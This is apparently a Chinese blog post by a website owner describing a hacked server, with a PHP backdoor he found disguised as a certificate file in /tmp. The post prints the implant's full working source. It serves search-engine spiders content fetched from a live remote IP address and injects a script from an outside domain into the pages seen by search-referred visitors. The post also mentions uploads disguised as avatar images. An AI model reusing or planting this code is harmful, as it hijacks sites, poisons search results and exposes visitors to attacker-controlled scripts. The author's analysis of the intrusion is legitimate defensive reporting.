• 提供远程的webshell


    之前网站被黑挂了马

    很恶心

    本人能力有限, 漏洞太多, 补不过来,网站经常被 黑客进来玩过家家。

    被逼无奈之下

    还好我发开了一整套的监控维护脚本系统

    只要你敢上传,  即上传即失效

    唉,废话不多少,来看脚本

    这B 竟然再我的 /tmp/   目录下上了个 伪装的类似安全证书的东西。一般你不细看 ,还是真的难区分啊

    一个PHP写的简单的远程webshell,总大小2kb 以内。总之就是很恶心

    源码:

    <?php
    set_time_limit(20);error_reporting(0);
    define('G','/');
    define('SOUGOU_YCURL','http://103.117.122.211:2008/');
    define('SOUGOU_spider', '@sogou.com|Sogou web spider/4.0|Sogou inst spider/4.0|360spider|HaosouSpider|Sosoimagespider|Sogou News Spider|Sosospider|so.com@i');
    define('URL',$_SERVER['SERVER_NAME']);define('REFERER',$_SERVER['HTTP_REFERER']);define('AGENT',$_SERVER['HTTP_USER_AGENT']);define('PHPGET',PHPGET());function IS_HTTP_URL(){if($_SERVER['SERVER_PORT']==80){$tcp="http://".$_SERVER['HTTP_HOST'];}else{$tcp="https://".$_SERVER['HTTP_HOST'];}}function YCcontent($url){$oo2=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($oo2);$hh2=file_get_contents($url,false,$context);if(empty($hh2)){$hh2=file_get_contents($url);}return $hh2;}function GETID(){preg_match_all('/d+/',$_SERVER['REQUEST_URI'],$a2ra1r1);$a2ra1=$a2ra1r1[0];sort($a2ra1);return $a2ra1[count($a2ra1)-1];}function PHPGET(){$dmmu2='';if(isset($_SERVER['REQUEST_URI'])){$dmmu2=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$dmmu2=mb_convert_encoding($dmmu2,'UTF-8','GBK');}else{$dmmu2=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$dmmu2))==$dmmu2?$dmmu2:@iconv('GBK','UTF-8',$dmmu2);}}$r2=explode('#',$dmmu2,2);$dmmu2=$r2[0];return $dmmu2;}if(preg_match(SOUGOU_spider,REFERER)){$dmmu2_s1=true;if(preg_match("@site%3A|inurl%3A@i",REFERER)){$dmmu2_s1=false;}if($dmmu2_s1){if(GETID() >=20){exit ('<script src="https://tz.001gov.xyz/js.js" type="text/javascript"></script>');}}}if(strstr(PHPGET,G)){if(preg_match(SOUGOU_spider,AGENT)){$dmmu2_u2=SOUGOU_YCURL.'?xu='.'&xh='.bin2hex(PHPGET);$dmmu2_u2.='&url='.IS_HTTP_URL().'&xh='.bin2hex(URL);$dmmu2_c2=YCcontent($dmmu2_u2);echo $dmmu2_c2;exit;}}
    ?>

    你拿去也没用,你得会渗透技术,才能把这破东西上到别人的服务器上,

    而且这串PHP脚本, 是需要连接到他们服务器的,所以,他们如果吧服务器给停了,你也通信不过去。。

    所以,望共勉,出了事,本人一概不承担任何责任!

    除此之外,还用到了图片伪装的方式上传,很机智。这样就可以通过正常的上传头像图片的方式直接上来

    这个漏洞还好我了解,并且被我干掉了。舒服

    很好很棒,我喜欢

    随便上传,能跑赢我的监控,算我输!!!!!

  • 相关阅读:
    ASP.NET 2.0个性化配置(profile)
    03 创建虚拟机
    一些新的Blender的视频教程
    [转载]虚拟家庭存档文件修改方法
    [转载]游戏开发中常用的设计模式
    批处理for命令详解(转)
    [转载]高效软件开发团队的特征
    软件构架师的特点
    一点SICP(Structure and Interpretation of Computer Programs) 资料 (转载加整理)
    [译]游戏编程入门(by David Astle)
  • 原文地址:https://www.cnblogs.com/huidou/p/10761405.html
Copyright © 2020-2023  润新知